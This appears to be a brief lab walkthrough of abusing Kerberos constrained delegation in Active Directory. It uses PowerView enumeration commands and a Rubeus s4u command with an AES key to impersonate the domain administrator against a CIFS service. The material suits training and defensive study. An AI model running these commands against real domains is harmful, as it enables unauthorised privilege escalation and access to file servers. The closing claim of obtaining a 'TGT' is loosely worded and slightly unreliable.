Enumerating Constrained Delegation using PowerView

Get-DomainComputer -TrustedToAuth | select name

We have the Admin SRV computer have Constrained Delegation

Let’s Check the users have Constrained Delegation

Get-DomainUser -TrustedToAuth | select name 

As we see we have the websvc user have Constrained Delegation

Now let’s understand how it works

If we compromised the user websvc we can access the file server (CIFS) as any user in the domain including Domain Admins

Now let’s use Rubeus to abuse the Constrained Delegation

.\\Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL /nowrap /ptt

Notice that we got a TGT as Administrator for the SPN CIFS